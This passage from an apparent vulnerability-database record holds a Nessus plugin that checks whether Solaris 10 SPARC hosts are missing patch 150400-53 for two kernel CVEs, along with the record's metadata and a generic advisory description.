arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdrcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefcl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.09.15.00.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWiopc\", version:\"11.10.0,REV=2006.07.11.11.28\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.10.0,REV=2005.08.04.12.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomr\", version:\"11.10.0,REV=2006.10.04.00.26\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomu\", version:\"11.10.0,REV=2006.08.08.12.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.14.02.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWn2cp\", version:\"11.10.0,REV=2007.07.08.21.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpiclu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.06.03.09.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandr\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandu\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandr\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandu\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust1\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust2\", version:\"11.10.0,REV=2007.07.08.17.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FJSVhea / FJSVmdbr / FJSVpiclu / SUNWarc / SUNWarcr / SUNWbtool / etc\");\n}\n", "title": "Solaris 10 (sparc) : 150400-53", "type": "nessus", "viewCount": 9}, "differentElements": ["description"], "edition": 5, "lastseen": "2019-01-16T20:33:01"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "2a6f0a0db5016ac737e102020eef9e9e"}, {"key": "cvelist", "hash": "2f557dd1a5dfe7846d859df9ecc45cb4"}, {"key": "cvss", "hash": "f74481c4d3fb2a622ac8c8a438ded811"}, {"key": "description", "hash": "5a88ad0a23edad02ee3a4d404f1bd9d0"}, {"key": "href", "hash": "e2721fd2840ebae34e5766f6ae74bd8c"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "be2073bfad5e624acf0f878f09eda795"}, {"key": "pluginID", "hash": "b02ba0108bebf04af1fc81be81a6b920"}, {"key": "published", "hash": "5850355f6181ab9617cc0d094e464031"}, {"key": "references", "hash": "0e2de2f910ca127ad179eb481fe7c6b1"}, {"key": "reporter", "hash": "0975adf19adb993cc2dc44ea6b27d31e"}, {"key": "sourceData", "hash": "37bebe7f021fd7843fb8432eec57a1e8"}, {"key": "title", "hash": "cea8147bf5d9fafd75da0830e93a2ee0"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "7b9f859a836ef0ec4581cc2b4cf24bafcf0756862d788ecfab537e1b4f6dad85", "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-10004", "CVE-2017-10122"]}, {"type": "nessus", "idList": ["SOLARIS_JUL2017_SRU11_3_21_5_0.NASL", "SOLARIS10_X86_150401-51.NASL", "SOLARIS10_X86_150401-53.NASL", "SOLARIS10_X86_150401-52.NASL", "SOLARIS10_150400-51.NASL", "SOLARIS10_150400-52.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-29087", "1337DAY-ID-30984", "1337DAY-ID-29403", "1337DAY-ID-29207", "1337DAY-ID-29361", "1337DAY-ID-30020", "1337DAY-ID-30017", "1337DAY-ID-29575"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2017-3236622"]}], "modified": "2019-11-03T12:17:02"}, "score": {"value": 6.0, "vector": "NONE", "modified": "2019-11-03T12:17:02"}, "vulnersScore": 6.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107721);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/22 9:47:14\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (sparc) : 150400-53\");\n script_summary(english:\"Check for patch 150400-53\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150400-53\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150400-53\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150400-53\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:122255\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:127980\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:137048\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:139510\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:139944\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142007\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142332\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144540\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146808\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146838\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146848\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:147697\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148161\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148174\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148231\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148338\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148553\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148557\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148721\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148730\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148766\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148875\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149502\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149616\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149640\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149642\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149648\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149718\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149729\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150108\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150109\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150115\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150125\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150161\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150169\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150300\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150307\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150311\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150400\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150527\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150531\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150532\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150541\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150627\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150629\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150756\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150760\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150840\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150841\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151145\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151149\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151425\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151608\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152367\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152530\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152539\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVmdbr\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVpiclu\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdrcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefcl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.09.15.00.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWiopc\", version:\"11.10.0,REV=2006.07.11.11.28\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.10.0,REV=2005.08.04.12.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomr\", version:\"11.10.0,REV=2006.10.04.00.26\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomu\", version:\"11.10.0,REV=2006.08.08.12.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.14.02.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWn2cp\", version:\"11.10.0,REV=2007.07.08.21.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", 